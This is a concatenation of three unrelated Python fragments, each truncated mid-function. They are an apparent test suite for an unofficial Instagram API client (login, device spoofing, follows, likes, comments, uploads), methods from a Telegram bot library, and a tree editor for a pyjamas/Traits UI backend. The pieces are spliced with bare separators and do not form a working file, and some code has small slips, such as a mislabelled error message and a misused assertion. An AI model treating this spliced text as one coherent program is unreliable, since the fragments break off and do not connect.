self.api.login(ACCOUNT_USERNAME, "fakepassword")
except Exception as e:
self.assertEqual(
str(e), "The password you entered is incorrect. Please try again."
)
class ClientPrivateTestCase(BaseClientMixin, unittest.TestCase):
api = None
def __init__(self, *args, **kwargs):
filename = f'/tmp/instagrapi_tests_client_settings_{ACCOUNT_USERNAME}.json'
self.api = Client()
try:
settings = self.api.load_settings(filename)
except FileNotFoundError:
settings = {}
except JSONDecodeError as e:
print('JSONDecodeError when read stored client settings. Use empty settings')
print(str(e))
settings = {}
self.api.set_settings(settings)
self.api.request_timeout = 1
self.set_proxy_if_exists()
if ACCOUNT_SESSIONID:
self.api.login_by_sessionid(ACCOUNT_SESSIONID)
else:
self.api.login(ACCOUNT_USERNAME, ACCOUNT_PASSWORD)
self.api.dump_settings(filename)
super().__init__(*args, **kwargs)
class ClientPublicTestCase(BaseClientMixin, unittest.TestCase):
api = None
def assertDict(self, obj, data):
for key, value in data.items():
if isinstance(value, str) and "..." in value:
self.assertTrue(value.replace("...", "") in obj[key])
elif isinstance(value, int):
self.assertTrue(obj[key] >= value)
else:
self.assertEqual(obj[key], value)
def test_media_info_gql(self):
media_pk = self.api.media_pk_from_url("https://www.instagram.com/p/BVDOOolFFxg/")
m = self.api.media_info_gql(media_pk)
self.assertIsInstance(m, Media)
media = {
'pk': 1532130876531694688,
'id': '1532130876531694688_1903424587',
'code': 'BVDOOolFFxg',
'taken_at': datetime(2017, 6, 7, 19, 37, 35, tzinfo=UTC()),
'media_type': 1,
'product_type': '',
'thumbnail_url': 'https://...',
'location': None,
'comment_count': 6,
'like_count': 79,
'has_liked': None,
'caption_text': '#creepy #creepyclothing',
'usertags': [],
'video_url': None,
'view_count': 0,
'video_duration': 0.0,
'title': '',
'resources': []
}
self.assertDict(m.dict(), media)
user = {
'pk': 1903424587,
'username': 'adw0rd',
'full_name': '<NAME>',
'profile_pic_url': 'https://...',
}
self.assertDict(m.user.dict(), user)
class ClientTestCase(unittest.TestCase):
def test_jazoest(self):
phone_id = "57d64c41-a916-3fa5-bd7a-3796c1dab122"
self.assertTrue(generate_jazoest(phone_id), "22413")
def test_lg(self):
settings = {
"uuids": {
"phone_id": "57d64c41-a916-3fa5-bd7a-3796c1dab122",
"uuid": "8aa373c6-f316-44d7-b49e-d74563f4a8f3",
"client_session_id": "6c296d0a-3534-4dce-b5aa-a6a6ab017443",
"advertising_id": "8dc88b76-dfbc-44dc-abbc-31a6f1d54b04",
"device_id": "android-e021b636049dc0e9"
},
"device_settings": {
"cpu": "h1",
"dpi": "640dpi",
"model": "h1",
"device": "RS988",
"resolution": "1440x2392",
"app_version": "172.16.31.10.123",
"manufacturer": "LGE/lge",
"version_code": "168361634",
"android_release": "6.0.1",
"android_version": 23
},
# "user_agent": "Instagram 172.16.31.10.123 Android (23/6.0.1; US; 168361634)"
"user_agent": "Instagram 172.16.58.3.119 Android (27/8.1.0; 480dpi; 1080x1776; motorola; Moto G (5S); montana; qcom; ru_RU; 253447809)"
}
api = Client(settings)
api.login(ACCOUNT_USERNAME, ACCOUNT_PASSWORD)
self.assertIsInstance(api.user_id, int)
self.assertEqual(api.username, ACCOUNT_USERNAME)
class ClientDeviceTestCase(ClientPrivateTestCase):
def test_set_device(self):
fields = ['uuids', 'cookies', 'last_login', 'device_settings', 'user_agent']
for field in fields:
settings = self.api.get_settings()
self.assertIn(field, settings)
device = {
"app_version": "172.16.17.32.119",
"android_version": 27,
"android_release": "8.1.0",
"dpi": "480dpi",
"resolution": "1080x1776",
"manufacturer": "motorola",
"device": "Moto G (5S)",
"model": "montana",
"cpu": "qcom",
"version_code": "253447809",
}
user_agent = "Instagram 165.1.0.29.119 Android (27/8.1.0; 480dpi; 1080x1776; motorola; Moto G (5S); montana; qcom; ru_RU; 253447809)"
self.api.set_device(device)
self.api.set_user_agent(user_agent)
settings = self.api.get_settings()
self.assertDictEqual(device, settings['device_settings'])
self.assertEqual(user_agent, settings['user_agent'])
self.api.user_info_by_username_v1('adw0rd')
request_user_agent = self.api.last_response.request.headers.get('User-Agent')
self.assertEqual(user_agent, request_user_agent)
class ClientUserTestCase(ClientPrivateTestCase):
def test_username_from_user_id(self):
self.assertEqual(self.api.username_from_user_id(1903424587), "adw0rd")
def test_user_medias(self):
user_id = self.api.user_id_from_username("adw0rd")
medias = self.api.user_medias(user_id, 20)
self.assertEqual(len(medias), 20)
media = medias[0]
self.assertIsInstance(media, Media)
for field in REQUIRED_MEDIA_FIELDS:
self.assertTrue(hasattr(media, field))
def test_user_followers(self):
user_id = self.api.user_id_from_username("asphalt_kings_lb")
followers = self.api.user_followers(self.api.user_id)
self.assertIn(user_id, followers)
self.assertEqual(followers[user_id].username, "asphalt_kings_lb")
def test_user_followers_amount(self):
user_id = self.api.user_id_from_username("adw0rd")
followers = self.api.user_followers(user_id, amount=10)
self.assertTrue(len(followers) == 10)
self.assertIsInstance(list(followers.values())[0], UserShort)
def test_user_following(self):
user_id = self.api.user_id_from_username("asphalt_kings_lb")
following = self.api.user_following(self.api.user_id)
self.assertIn(user_id, following)
self.assertEqual(following[user_id].username, "asphalt_kings_lb")
def test_user_following_amount(self):
user_id = self.api.user_id_from_username("adw0rd")
following = self.api.user_following(user_id, amount=10)
self.assertTrue(len(following) == 10)
self.assertIsInstance(list(following.values())[0], UserShort)
def test_user_follow_unfollow(self):
user_id = self.api.user_id_from_username("bmxtravel")
self.api.user_follow(user_id)
following = self.api.user_following(self.api.user_id)
self.assertIn(user_id, following)
self.api.user_unfollow(user_id)
following = self.api.user_following(self.api.user_id)
self.assertNotIn(user_id, following)
def test_user_info(self):
user_id = self.api.user_id_from_username("adw0rd")
user = self.api.user_info(user_id)
self.assertIsInstance(user, User)
for key, value in {
"biography": "Engineer: Python, JavaScript, Erlang...",
"external_url": "https://adw0rd.com/",
"full_name": "<NAME>",
"pk": 1903424587,
"is_private": False,
"is_verified": False,
"profile_pic_url": "https://...",
"username": "adw0rd",
}.items():
if isinstance(value, str) and "..." in value:
self.assertTrue(value.replace("...", "") in getattr(user, key))
else:
self.assertEqual(value, getattr(user, key))
def test_user_info_by_username(self):
user = self.api.user_info_by_username("adw0rd")
self.assertIsInstance(user, User)
self.assertEqual(user.pk, 1903424587)
self.assertEqual(user.full_name, "<NAME>")
self.assertFalse(user.is_private)
class ClientMediaTestCase(ClientPrivateTestCase):
def test_media_id(self):
self.assertEqual(
self.api.media_id(2154602296692269830), "2154602296692269830_1903424587"
)
def test_media_pk(self):
self.assertEqual(
self.api.media_pk("2154602296692269830_1903424587"), 2154602296692269830
)
def test_media_pk_from_code(self):
self.assertEqual(
self.api.media_pk_from_code("B-fKL9qpeab"), 2278584739065882267
)
self.assertEqual(
self.api.media_pk_from_code("B8jnuB2HAbyc0q001y3F9CHRSoqEljK_dgkJjo0"),
2243811726252050162,
)
def test_media_pk_from_url(self):
self.assertEqual(
self.api.media_pk_from_url("https://instagram.com/p/B1LbfVPlwIA/"),
2110901750722920960,
)
self.assertEqual(
self.api.media_pk_from_url(
"https://www.instagram.com/p/B-fKL9qpeab/?igshid=1xm76zkq7o1im"
),
2278584739065882267,
)
def test_media_edit(self):
# Upload photo
media_pk = self.api.media_pk_from_url("https://www.instagram.com/p/BVDOOolFFxg/")
path = self.api.photo_download(media_pk)
self.assertIsInstance(path, Path)
try:
msg = "Test caption for photo"
media = self.api.photo_upload(path, msg)
self.assertIsInstance(media, Media)
self.assertEqual(media.caption_text, msg)
# Change caption
msg = "New caption %s" % random.randint(1, 100)
self.api.media_edit(media.pk, msg)
media = self.api.media_info(media.pk)
self.assertIsInstance(media, Media)
self.assertEqual(media.caption_text, msg)
self.assertTrue(self.api.media_delete(media.pk))
finally:
cleanup(path)
def test_media_edit_igtv(self):
media_pk = self.api.media_pk_from_url(
"https://www.instagram.com/tv/B91gKCcpnTk/"
)
path = self.api.igtv_download(media_pk)
self.assertIsInstance(path, Path)
try:
media = self.api.igtv_upload(path, "Test title", "Test caption for IGTV")
self.assertIsInstance(media, Media)
# Enter title
title = "Title %s" % random.randint(1, 100)
msg = "New caption %s" % random.randint(1, 100)
self.api.media_edit(media.pk, msg, title)
media = self.api.media_info(media.pk)
self.assertIsInstance(media, Media)
self.assertEqual(media.title, title)
self.assertEqual(media.caption_text, msg)
# Split caption to title and caption
title = "Title %s" % random.randint(1, 100)
msg = "New caption %s" % random.randint(1, 100)
self.api.media_edit(media.pk, f"{title}\n{msg}")
media = self.api.media_info(media.pk)
self.assertIsInstance(media, Media)
self.assertEqual(media.title, title)
self.assertEqual(media.caption_text, msg)
# Empty title (duplicate one-line caption)
msg = "New caption %s" % random.randint(1, 100)
self.api.media_edit(media.pk, msg, "")
media = self.api.media_info(media.pk)
self.assertIsInstance(media, Media)
self.assertEqual(media.title, msg)
self.assertEqual(media.caption_text, msg)
self.assertTrue(self.api.media_delete(media.id))
finally:
cleanup(path)
def test_media_user(self):
user = self.api.media_user(2154602296692269830)
self.assertIsInstance(user, UserShort)
for key, val in {
"pk": 1903424587,
"username": "adw0rd",
"full_name": "<NAME>",
}.items():
self.assertEqual(getattr(user, key), val)
self.assertTrue(user.profile_pic_url.startswith("https://"))
def test_media_oembed(self):
media_oembed = self.api.media_oembed(
"https://www.instagram.com/p/B3mr1-OlWMG/"
)
self.assertIsInstance(media_oembed, MediaOembed)
for key, val in {
"title": "В гостях у ДК @delai_krasivo_kaifui",
"author_name": "adw0rd",
"author_url": "https://www.instagram.com/adw0rd",
"author_id": 1903424587,
"media_id": "2154602296692269830_1903424587",
"width": 658,
"height": None,
"thumbnail_width": 640,
"thumbnail_height": 480,
"can_view": True,
}.items():
self.assertEqual(getattr(media_oembed, key), val)
self.assertTrue(media_oembed.thumbnail_url.startswith('http'))
def test_media_like_by_pk(self):
media_pk = self.api.media_pk_from_url(
"https://www.instagram.com/p/ByU3LAslgWY/"
)
self.assertTrue(
self.api.media_like(media_pk)
)
def test_media_like_and_unlike(self):
media_pk = self.api.media_pk_from_url(
"https://www.instagram.com/p/B3mr1-OlWMG/"
)
self.assertTrue(self.api.media_unlike(media_pk))
media = self.api.media_info_v1(media_pk)
like_count = int(media.like_count)
# like
self.assertTrue(self.api.media_like(media.id))
media = self.api.media_info_v1(media_pk) # refresh after like
new_like_count = int(media.like_count)
self.assertEqual(new_like_count, like_count + 1)
# unlike
self.assertTrue(self.api.media_unlike(media.id))
media = self.api.media_info_v1(media_pk) # refresh after unlike
self.assertEqual(media.like_count, like_count)
def test_media_likers(self):
media = self.api.user_medias(self.api.user_id, amount=3)[-1]
self.assertIsInstance(media, Media)
likers = self.api.media_likers(media.pk)
self.assertTrue(len(likers) > 0)
self.assertIsInstance(likers[0], UserShort)
class ClientCommentTestCase(ClientPrivateTestCase):
def test_media_comments(self):
comments = self.api.media_comments(2154602296692269830)
self.assertTrue(len(comments) > 5)
comment = comments[0]
self.assertIsInstance(comment, Comment)
comment_fields = comment.fields.keys()
user_fields = comment.user.fields.keys()
for field in [
"pk",
"text",
"created_at_utc",
"content_type",
"status",
"user"
]:
self.assertIn(field, comment_fields)
for field in [
"pk",
"username",
"full_name",
"profile_pic_url",
]:
self.assertIn(field, user_fields)
def test_media_comment(self):
text = "Test text [%s]" % datetime.now().strftime("%s")
now = datetime.now(tz=UTC())
comment = self.api.media_comment(2276404890775267248, text)
self.assertIsInstance(comment, Comment)
comment = comment.dict()
for key, val in {
"text": text,
"content_type": "comment",
"status": "Active"
}.items():
self.assertEqual(comment[key], val)
self.assertIn("pk", comment)
# The comment was written no more than 120 seconds ago
self.assertTrue(
abs((now - comment["created_at_utc"]).total_seconds()) <= 120
)
user_fields = comment['user'].keys()
for field in ["pk", "username", "full_name", "profile_pic_url"]:
self.assertIn(field, user_fields)
def test_comment_like_and_unlike(self):
media_pk = self.api.media_pk_from_url(
"https://www.instagram.com/p/B3mr1-OlWMG/"
)
comment = self.api.media_comments(media_pk)[0]
if comment.has_liked:
self.assertTrue(
self.api.comment_unlike(comment.pk)
)
like_count = int(comment.like_count)
# like
self.assertTrue(self.api.comment_like(comment.pk))
comment = self.api.media_comments(media_pk)[0]
new_like_count = int(comment.like_count)
self.assertEqual(new_like_count, like_count + 1)
# unlike
self.assertTrue(self.api.comment_unlike(comment.pk))
comment = self.api.media_comments(media_pk)[0]
self.assertEqual(comment.like_count, like_count)
class ClientCompareExtractTestCase(ClientPrivateTestCase):
def assertLocation(self, v1, gql):
if not isinstance(v1, dict):
return self.assertEqual(v1, gql)
for key, val in v1.items():
if key == 'external_id':
continue # id may differ
gql_val = gql[key]
if isinstance(val, float):
val, gql_val = round(val, 4), round(gql_val, 4)
self.assertEqual(val, gql_val)
def assertMedia(self, v1, gql):
self.assertTrue(v1.pop("comment_count") <= gql.pop("comment_count"))
self.assertLocation(v1.pop('location'), gql.pop('location'))
v1.pop('has_liked')
gql.pop('has_liked')
self.assertDictEqual(v1, gql)
def media_info(self, media_pk):
media_v1 = self.api.media_info_v1(media_pk)
self.assertIsInstance(media_v1, Media)
media_gql = self.api.media_info_gql(media_pk)
self.assertIsInstance(media_gql, Media)
return media_v1.dict(), media_gql.dict()
def test_two_extract_media_photo(self):
media_v1, media_gql = self.media_info(
self.api.media_pk_from_code('B3mr1-OlWMG')
)
self.assertTrue(media_v1.pop("thumbnail_url").startswith("https://"))
self.assertTrue(media_gql.pop("thumbnail_url").startswith("https://"))
self.assertMedia(media_v1, media_gql)
def test_two_extract_media_video(self):
media_v1, media_gql = self.media_info(
self.api.media_pk_from_code('B3rFQPblq40')
)
self.assertTrue(media_v1.pop("video_url").startswith("https://"))
self.assertTrue(media_gql.pop("video_url").startswith("https://"))
self.assertTrue(media_v1.pop("thumbnail_url").startswith("https://"))
self.assertTrue(media_gql.pop("thumbnail_url").startswith("https://"))
self.assertMedia(media_v1, media_gql)
def test_two_extract_media_album(self):
media_v1, media_gql = self.media_info(
self.api.media_pk_from_code('BjNLpA1AhXM')
)
for res in media_v1['resources']:
self.assertTrue(res.pop("thumbnail_url").startswith("https://"))
if res['media_type'] == 2:
self.assertTrue(res.pop("video_url").startswith("https://"))
for res in media_gql['resources']:
self.assertTrue(res.pop("thumbnail_url").startswith("https://"))
if res['media_type'] == 2:
self.assertTrue(res.pop("video_url").startswith("https://"))
self.assertMedia(media_v1, media_gql)
def test_two_extract_media_igtv(self):
media_v1, media_gql = self.media_info(
self.api.media_pk_from_code('ByYn5ZNlHWf')
)
self.assertTrue(media_v1.pop("video_url").startswith("https://"))
self.assertTrue(media_gql.pop("video_url").startswith("https://"))
self.assertTrue(media_v1.pop("thumbnail_url").startswith("https://"))
self.assertTrue(media_gql.pop("thumbnail_url").startswith("https://"))
self.assertMedia(media_v1, media_gql)
def test_two_extract_user(self):
user_v1 = self.api.user_info_v1(1903424587)
user_gql = self.api.user_info_gql(1903424587)
self.assertIsInstance(user_v1, User)
self.assertIsInstance(user_gql, User)
user_v1, user_gql = user_v1.dict(), user_gql.dict()
self.assertTrue(user_v1.pop("profile_pic_url").startswith("https://"))
self.assertTrue(user_gql.pop("profile_pic_url").startswith("https://"))
self.assertDictEqual(user_v1, | |
is
returned.
Raises:
:class:`telegram.TelegramError`
"""
if inline_message_id is None and (chat_id is None or message_id is None):
raise TelegramError(
'editMessageCaption: Both chat_id and message_id are required when '
'inline_message_id is not specified')
url = '{0}/editMessageReplyMarkup'.format(self.base_url)
data = {}
if chat_id:
data['chat_id'] = chat_id
if message_id:
data['message_id'] = message_id
if inline_message_id:
data['inline_message_id'] = inline_message_id
return url, data
@log
def get_updates(self,
offset=None,
limit=100,
timeout=0,
network_delay=None,
read_latency=2.,
allowed_updates=None,
**kwargs):
"""Use this method to receive incoming updates using long polling.
Args:
offset (Optional[int]): Identifier of the first update to be returned. Must be greater
by one than the highest among the identifiers of previously received updates. By
default, updates starting with the earliest unconfirmed update are returned. An
update is considered confirmed as soon as getUpdates is called with an offset
higher than its update_id.
limit (Optional[int]): Limits the number of updates to be retrieved. Values between
1-100 are accepted. Defaults to 100.
allowed_updates (Optional[list[str]]): List the types of updates you want your bot to
receive. For example, specify
``["message", "edited_channel_post", "callback_query"]`` to only receive updates of
these types. See ``telegram.Update`` for a complete list of available update types.
Specify an empty list to receive all updates regardless of type (default). If not
specified, the previous setting will be used.
Please note that this parameter doesn't affect updates created before the call to
the setWebhook, so unwanted updates may be received for a short period of time.
timeout (Optional[int]): Timeout in seconds for long polling. Defaults to 0, i.e. usual
short polling. Be careful not to set this timeout too high, as the connection might
be dropped and there's no way of knowing it immediately (so most likely the failure
will be detected after the timeout had passed).
network_delay: Deprecated. Will be honoured as `read_latency` for a while but will be
removed in the future.
read_latency (Optional[float|int]): Grace time in seconds for receiving the reply from
server. Will be added to the `timeout` value and used as the read timeout from
server (Default: 2).
**kwargs (dict): Arbitrary keyword arguments.
Notes:
The main problem with long polling is that a connection will be dropped and we won't
be getting the notification in time for it. For that, we need to use long polling, but
not too long as well read latency which is short, but not too short.
Long polling improves performance, but if it's too long and the connection is dropped
on many cases we won't know the connection dropped before the long polling timeout and
the read latency time had passed. If you experience connection timeouts, you should
tune these settings.
Returns:
list[:class:`telegram.Update`]
Raises:
:class:`telegram.TelegramError`
"""
url = '{0}/getUpdates'.format(self.base_url)
if network_delay is not None:
warnings.warn('network_delay is deprecated, use read_latency instead')
read_latency = network_delay
data = {'timeout': timeout}
if offset:
data['offset'] = offset
if limit:
data['limit'] = limit
if allowed_updates is not None:
data['allowed_updates'] = allowed_updates
# Ideally we'd use an aggressive read timeout for the polling. However,
# * Short polling should return within 2 seconds.
# * Long polling poses a different problem: the connection might have been dropped while
# waiting for the server to return and there's no way of knowing the connection had been
# dropped in real time.
result = self._request.post(url, data, timeout=float(read_latency) + float(timeout))
if result:
self.logger.debug('Getting updates: %s', [u['update_id'] for u in result])
else:
self.logger.debug('No new updates found.')
return [Update.de_json(u, self) for u in result]
@log
def set_webhook(self,
url=None,
certificate=None,
timeout=None,
max_connections=40,
allowed_updates=None,
**kwargs):
"""Use this method to specify a url and receive incoming updates via an outgoing webhook.
Whenever there is an update for the bot, we will send an HTTPS POST request to the
specified url, containing a JSON-serialized Update. In case of an unsuccessful request, we
will give up after a reasonable amount of attempts.
Args:
url (str): HTTPS url to send updates to. Use an empty string to remove webhook
integration.
certificate (file): Upload your public key certificate so that the root certificate in
use can be checked.
max_connections (Optional[int]): Maximum allowed number of simultaneous HTTPS
connections to the webhook for update delivery, 1-100. Defaults to 40. Use lower
values to limit the load on your bot's server, and higher values to increase your
bot's throughput.
allowed_updates (Optional[list[str]]): List the types of updates you want your bot to
receive. For example, specify
``["message", "edited_channel_post", "callback_query"]`` to only receive updates of
these types. See ``telegram.Update`` for a complete list of available update types.
Specify an empty list to receive all updates regardless of type (default). If not
specified, the previous setting will be used.
Please note that this parameter doesn't affect updates created before the call to
the setWebhook, so unwanted updates may be received for a short period of time.
timeout (Optional[int|float]): If this value is specified, use it as the read timeout
from the server (instead of the one specified during creation of the connection
pool).
**kwargs (dict): Arbitrary keyword arguments.
Returns:
bool: On success, `True` is returned.
Raises:
:class:`telegram.TelegramError`
"""
url_ = '{0}/setWebhook'.format(self.base_url)
# Backwards-compatibility: 'url' used to be named 'webhook_url'
if 'webhook_url' in kwargs:
warnings.warn("The 'webhook_url' parameter has been renamed to 'url' in accordance "
"with the API")
if url is not None:
raise ValueError("The parameters 'url' and 'webhook_url' are mutually exclusive")
url = kwargs['webhook_url']
del kwargs['webhook_url']
data = {}
if url is not None:
data['url'] = url
if certificate:
data['certificate'] = certificate
if max_connections is not None:
data['max_connections'] = max_connections
if allowed_updates is not None:
data['allowed_updates'] = allowed_updates
result = self._request.post(url_, data, timeout=timeout)
return result
@log
def delete_webhook(self, timeout=None, **kwargs):
"""Use this method to remove webhook integration if you decide to switch back to
getUpdates. Returns True on success. Requires no parameters.
Args:
timeout (Optional[float]): If this value is specified, use it as the definitive timeout
(in seconds) for urlopen() operations.
**kwargs (dict): Arbitrary keyword arguments.
Returns:
bool: On success, `True` is returned.
Raises:
:class:`telegram.TelegramError`
"""
url = '{0}/deleteWebhook'.format(self.base_url)
data = {}
result = self._request.post(url, data, timeout=timeout)
return result
@log
def leave_chat(self, chat_id, timeout=None, **kwargs):
"""Use this method for your bot to leave a group, supergroup or channel.
Args:
chat_id (int|str): Unique identifier for the target chat or username of the target
channel (in the format @channelusername).
timeout (Optional[int|float]): If this value is specified, use it as the read timeout
from the server (instead of the one specified during creation of the connection
pool).
**kwargs (dict): Arbitrary keyword arguments.
Returns:
bool: On success, `True` is returned.
Raises:
:class:`telegram.TelegramError`
"""
url = '{0}/leaveChat'.format(self.base_url)
data = {'chat_id': chat_id}
result = self._request.post(url, data, timeout=timeout)
return result
@log
def get_chat(self, chat_id, timeout=None, **kwargs):
"""Use this method to get up to date information about the chat (current name of the user
for one-on-one conversations, current username of a user, group or channel, etc.).
Args:
chat_id (int|str): Unique identifier for the target chat or username of the target
channel (in the format @channelusername).
timeout (Optional[int|float]): If this value is specified, use it as the read timeout
from the server (instead of the one specified during creation of the connection
pool).
**kwargs (dict): Arbitrary keyword arguments.
Returns:
:class:`telegram.Chat`: On success, :class:`telegram.Chat` is
returned.
Raises:
:class:`telegram.TelegramError`
"""
url = '{0}/getChat'.format(self.base_url)
data = {'chat_id': chat_id}
result = self._request.post(url, data, timeout=timeout)
return Chat.de_json(result, self)
@log
def get_chat_administrators(self, chat_id, timeout=None, **kwargs):
"""Use this method to get a list of administrators in a chat. On success, returns an Array
of ChatMember objects that contains information about all chat administrators except other
bots. If the chat is a group or a supergroup and no administrators were appointed, only the
creator will be returned.
Args:
chat_id (int|str): Unique identifier for the target chat or username of the target
channel (in the format @channelusername).
timeout (Optional[int|float]): If this value is specified, use it as the read timeout
from the server (instead of the | |
<reponame>rwl/traitsbackendpyjamas
#------------------------------------------------------------------------------
# Copyright (c) 2007, Riverbank Computing Limited
# Copyright (c) 2009, <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#------------------------------------------------------------------------------
""" Defines the tree editor for the PyQt user interface toolkit.
"""
#-------------------------------------------------------------------------------
# Imports:
#-------------------------------------------------------------------------------
import copy
from pyjamas.ui.Tree import Tree
from pyjamas.ui.VerticalPanel import VerticalPanel
from pyjamas.ui.ScrollPanel import ScrollPanel
from pyjamas.ui.vertsplitpanel import VerticalSplitPanel
from pyjamas.ui.horizsplitpanel import HorizontalSplitPanel
from enthought.pyface.resource_manager \
import resource_manager
from enthought.traits.api \
import Any, Event
from enthought.traits.trait_base \
import enumerate
from enthought.traits.ui.api \
import TreeNode, ObjectTreeNode, MultiTreeNode
# FIXME: ToolkitEditorFactory is a proxy class defined here just for backward
# compatibility. The class has been moved to the
# enthought.traits.ui.editors.tree_editor file.
from enthought.traits.ui.editors.tree_editor \
import ToolkitEditorFactory
from enthought.traits.ui.undo \
import ListUndoItem
from enthought.traits.ui.menu \
import Menu, Action, Separator
#from clipboard \
# import clipboard, PyMimeData
from editor \
import Editor
#from helper \
# import open_fbi, pixmap_cache
#-------------------------------------------------------------------------------
# The core tree node menu actions:
#-------------------------------------------------------------------------------
NewAction = 'NewAction'
CopyAction = Action( name = 'Copy',
action = 'editor._menu_copy_node',
enabled_when = 'editor._is_copyable(object)' )
CutAction = Action( name = 'Cut',
action = 'editor._menu_cut_node',
enabled_when = 'editor._is_cutable(object)' )
PasteAction = Action( name = 'Paste',
action = 'editor._menu_paste_node',
enabled_when = 'editor._is_pasteable(object)' )
DeleteAction = Action( name = 'Delete',
action = 'editor._menu_delete_node',
enabled_when = 'editor._is_deletable(object)' )
RenameAction = Action( name = 'Rename',
action = 'editor._menu_rename_node',
enabled_when = 'editor._is_renameable(object)' )
#-------------------------------------------------------------------------------
# 'SimpleEditor' class:
#-------------------------------------------------------------------------------
class SimpleEditor ( Editor ):
""" Simple style of tree editor.
"""
#---------------------------------------------------------------------------
# Trait definitions:
#---------------------------------------------------------------------------
# Is the tree editor is scrollable? This value overrides the default.
scrollable = True
# Allows an external agent to set the tree selection
selection = Event
# The currently selected object
selected = Any
# The event fired when a tree node is clicked on:
click = Event
# The event fired when a tree node is double-clicked on:
dclick = Event
# The event fired when the application wants to veto an operation:
veto = Event
#---------------------------------------------------------------------------
# Finishes initializing the editor by creating the underlying toolkit
# widget:
#---------------------------------------------------------------------------
def init ( self, parent ):
""" Finishes initializing the editor by creating the underlying toolkit
widget.
"""
factory = self.factory
self._editor = None
if factory.editable:
# Check to see if the tree view is based on a shared trait editor:
if factory.shared_editor:
factory_editor = factory.editor
# If this is the editor that defines the trait editor panel:
if factory_editor is None:
# Remember which editor has the trait editor in the factory:
factory._editor = self
# Create the trait editor panel:
# self.control = Widget(panel)
self.control = VerticalPanel()
self.control._node_ui = self.control._editor_nid = None
# Check to see if there are any existing editors that are
# waiting to be bound to the trait editor panel:
editors = factory._shared_editors
if editors is not None:
for editor in factory._shared_editors:
# If the editor is part of this UI:
if editor.ui is self.ui:
# Then bind it to the trait editor panel:
editor._editor = self.control
# Indicate all pending editors have been processed:
factory._shared_editors = None
# We only needed to build the trait editor panel, so exit:
return
# Check to see if the matching trait editor panel has been
# created yet:
editor = factory_editor._editor
if (editor is None) or (editor.ui is not self.ui):
# If not, add ourselves to the list of pending editors:
shared_editors = factory_editor._shared_editors
if shared_editors is None:
factory_editor._shared_editors = shared_editors = []
shared_editors.append( self )
else:
# Otherwise, bind our trait editor panel to the shared one:
self._editor = editor.control
# Finally, create only the tree control:
self.control = self._tree = Tree()
else:
# If editable, create a tree control and an editor panel:
self._tree = Tree()
self._editor = sp = ScrollPanel()
# sp.setFrameShape(QtGui.QFrame.NoFrame)
sp._node_ui = sp._editor_nid = None
if factory.orientation == 'horizontal':
self.control = splitter = HorizontalSplitPanel()
self.control.setLeftWidget( self._tree )
self.control.setRightWidget( sp )
else:
self.control = splitter = VerticalSplitPanel()
self.control.setTopWidget( self._tree )
self.control.setBottomWidget( sp )
else:
# Otherwise, just create the tree control:
self.control = self._tree = Tree()
# Set up the mapping between objects and tree id's:
self._map = {}
# Initialize the 'undo state' stack:
self._undoable = []
# Synchronize external object traits with the editor:
self.sync_value( factory.selected, 'selected' )
self.sync_value( factory.click, 'click', 'to' )
self.sync_value( factory.dclick, 'dclick', 'to' )
self.sync_value( factory.veto, 'veto', 'from' )
#---------------------------------------------------------------------------
# Handles the 'selection' trait being changed:
#---------------------------------------------------------------------------
def _selection_changed ( self, selection ):
""" Handles the **selection** event.
"""
try:
self._tree.setSelectedItem( self._object_info( selection )[2] )
except:
pass
#---------------------------------------------------------------------------
# Handles the 'selected' trait being changed:
#---------------------------------------------------------------------------
def _selected_changed ( self, selected ):
""" Handles the **selected** trait being changed.
"""
if not self._no_update_selected:
self._selection_changed( selected )
#---------------------------------------------------------------------------
# Handles the 'veto' event being fired:
#---------------------------------------------------------------------------
def _veto_changed ( self ):
""" Handles the 'veto' event being fired.
"""
self._veto = True
#---------------------------------------------------------------------------
# Disposes of the contents of an editor:
#---------------------------------------------------------------------------
def dispose ( self ):
""" Disposes of the contents of an editor.
"""
if self._tree is not None:
# Stop the chatter (specifically about the changing selection).
# self._tree.blockSignals(True)
self._delete_node( self._tree.getItem(0) )
self._tree = None
super( SimpleEditor, self ).dispose()
#---------------------------------------------------------------------------
# Expands from the specified node the specified number of sub-levels:
#---------------------------------------------------------------------------
def expand_levels ( self, nid, levels, expand = True ):
""" Expands from the specified node the specified number of sub-levels.
"""
if levels > 0:
expanded, node, object = self._get_node_data( nid )
if self._has_children( node, object ):
self._expand_node( nid )
if expand:
nid.setState( True )
for cnid in self._nodes_for( nid ):
self.expand_levels( cnid, levels - 1 )
#---------------------------------------------------------------------------
# Updates the editor when the object trait changes external to the editor:
#---------------------------------------------------------------------------
def update_editor ( self ):
""" Updates the editor when the object trait changes externally to the
editor.
"""
tree = self._tree
# saved_state = {}
tree.clear()
object, node = self._node_for( self.value )
if node is not None:
if self.factory.hide_root:
nid = tree.getItem( 0 )
else:
nid = TreeItem( node.get_label( object ) )
# nid.setText(0, node.get_label(object))
# nid.setIcon(0, self._get_icon(node, object))
# nid.setToolTip(0, node.get_tooltip(object))
self._map[ id( object ) ] = [ ( node.children, nid ) ]
self._add_listeners( node, object )
self._set_node_data( nid, ( False, node, object) )
if self.factory.hide_root or self._has_children( node, object ):
self._expand_node( nid )
if not self.factory.hide_root:
nid.setState( True )
tree.setSelectedItem( nid )
self.expand_levels( nid, self.factory.auto_open, False )
# FIXME: Clear the current editor (if any)...
#---------------------------------------------------------------------------
# Returns the editor's control for indicating error status:
#---------------------------------------------------------------------------
def get_error_control ( self ):
""" Returns the editor's control for indicating error status.
"""
return self._tree
#---------------------------------------------------------------------------
# Appends a new node to the specified node:
#---------------------------------------------------------------------------
def _append_node ( self, nid, node, object ):
""" Appends a new node to the specified node.
"""
